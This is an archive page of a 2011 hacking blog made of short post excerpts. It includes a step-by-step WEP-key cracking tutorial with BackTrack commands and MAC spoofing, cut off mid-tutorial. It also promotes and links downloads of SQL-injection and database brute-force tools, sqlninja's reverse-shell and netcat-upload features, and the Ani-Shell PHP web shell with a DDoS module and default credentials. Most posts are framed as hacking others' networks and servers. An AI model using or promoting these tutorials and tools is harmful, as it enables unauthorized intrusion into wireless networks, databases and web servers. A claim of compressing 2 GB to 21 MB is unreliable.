Posts

Showing posts from November, 2011

Wi-Fi Network Hacking Software

How a wireless network works...??? A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients. Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with. The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Every BSS has an Identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with  every NIC. For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSID to let the clients know that an AP is in range. Data streams, known as packets, are sent between the Access Point, and it’s clients. You need no physical access t

Wi-Fi Network Hacking Using Back Track

Image
This tutorial will explain that how to crack wep key using Backtrack..!!    Step 1:- First Download Backtrack  from the following link: http://www.remote-exploit.org/backtrack_download.html Step 2:- Burn the iso image on CD and boot your laptop from CD drive Step 3:- Select the third boot option(VESA/KDE). Step 4:- Once in BT3, click the tiny black box in the lower left corner to load up a   "Konsole" window. Step 5:- Type the following command airmon-ng Note down the interface name. In this example wifi0 Step 6:- airmon-ng stop wifi0 Step 7:- ifconfig wifi0 down Step 8:- macchanger --mac 00:11:22:33:44:66 wifi0 Step 9:- airmon-ng start wifi0 Step 10:- airodump-ng wifi0 This will start populating Wifi networks. Press Ctrl + C to stop. Check the network with WEP encryption. Notedown BSSID, CH and ESSID somewhere in notepad or paper Note that if the same BSSID is available

How to compress 1 Gb data to 10 mb

Image
Many times our  hard disk runs out of space  and we have to  delete some data  or the other for no reason. I used to face this problem a few days back but now  found a working and an awesome way to save my hard disk space. How Effective is this..?? This software has amzing compression power. i have converted one of my file which was about 2 GB but after compression its is in just 21MB by   KGB Archiver. About KGB archiver : KGB Archiver , an open source compression tool like  7zip  and  UHARC  with an unbelievably high compression rate . It uses AES-256 encryption  (one of the strongest  encryption ) to  encrypt archives . The disappointing thing with KGB Archiver is due to its high compression rate its minimum hardware requirement is high ( recommend processor with 1,5GHz clock and 256MB of RAM ) and compression and decompression process is time consuming.  D ownload Here

HexorBase - The DataBase Hacker Tool

Image
To Audit Management and Multiple Databases HexorBase is a database application designed for management and audit multiple database servers simultaneously from a single location, is able to perform SQL queries and brute force attacks against servers common database ( MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ). This tool is simple to use and very practical, may have to know a little SQL, but the basics. Video: HexorBase runs on Linux and presumably Windows, and requires: python-qt4 python python-MySQLdb cx_Oracle python-psycopg2 python-python-qscintilla2 pymssql To install it you must download and from the console: root @ host: ~ # dpkg-i hexorbase_1.0_all.deb Project website and download HexorBase:  http://code.google.com/p/hexorbase/

Net Tools 5.0 (Net Tools 5.x)

Image
This tools is a hacker friendly. Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It's an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET. There has a 175 tools list in one software.... Tools Content Download Here

DRIL – Domain Reverse IP Lookup Tool:

Image
DRIL (Domain Reverse IP Lookup) Tool is a Reverse Domain Tool that will really be useful for penetration testers to find out the domain names which are listed in the the target host, DRIL is a GUI, JAVA based application which uses a Bing API key. DRIL has a simple user friendly interface which will be helpful for penetration tester to do their work fast without a mess, this is only tested on Linux but as it is JAVA it should work on Windows too. There are various other tools which carry out similar tasks .. Download Here

SQL MAP 0.9

Image
sqlmap 0.9 has been released and has a considerable amount of changes including an almost entirely re-written SQL Injection detection engine. Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.   Its a good tools for find Sql Vulnerability. New Features/Changes --> Rewritten SQL injection detection engine (Bernardo and Miroslav). Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav). Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Be

Ani-Shell

Image
Download Here Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , DDoser, Back Connect , Bind Shell etc etc ! This shell has immense capabilities and have been written with some coding standards in mind for better editing and customization. Customisation   1. Email Trace back is set to Off as default and emails will not be sent , If you are setting this feature on make sure you change the default email address (lionaneesh@gmail.com)  to Your email address , Please Change it before using. 2. Username and Passwords are set to lionaneesh and lionaneesh respectively , Please change them for better security. 3. As a default Lock Mode is set to on! This should not be change unless you want your shell exposed. Default Login Username : lionaneesh Password : lionaneesh Features       Shell     Platform Independent     Mass - Mailer     Small Web-Server Fuzzer     DDoser     Design     Secure Login     Deletion of Files     Bind Shell

Havij v1.15 Advanced SQL Injection

Image
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.         Download Here

SQLNINJA 0.2.6

Image
Features:  >> Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode) >>  Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental). >> Creation of a custom xp_cmdshell if the original one has been removed >> Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed). >> TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell. >> Direct and reverse bindshell, both TCP and UDP >> ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box. >>   DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for  a direct/reverse shell, but the DB server can resolve external hostnames  (check the documentation for detai

Manually virus removal from 'System Volume information

Image
CYBER WORLD In Windows,  System Volume Information is a system folder, to keep track of the changes took placed on a partition in a fix time period. This folder exists in every partition on your HDD. By default this folder is hidden, but you can see it by showing the hidden and system files and folders.The information stored in these folders helps Windows to revert to an earlier state, when you use the System Restore tool. But sometimes, some malware files get in the System Volume Information folder. This can happens by any of following reasons:  the malware wants to get there so that user doesn't have access to delete it and from where it can restore i t self,  or some  m alware file gets deleted and Windows decides that the file was important and it automatically stores it there, in case you ever want it back. Well, you can easily clean malware infection from this folder by using the following simple steps: Right click on  My Computer , then go to  Properties Now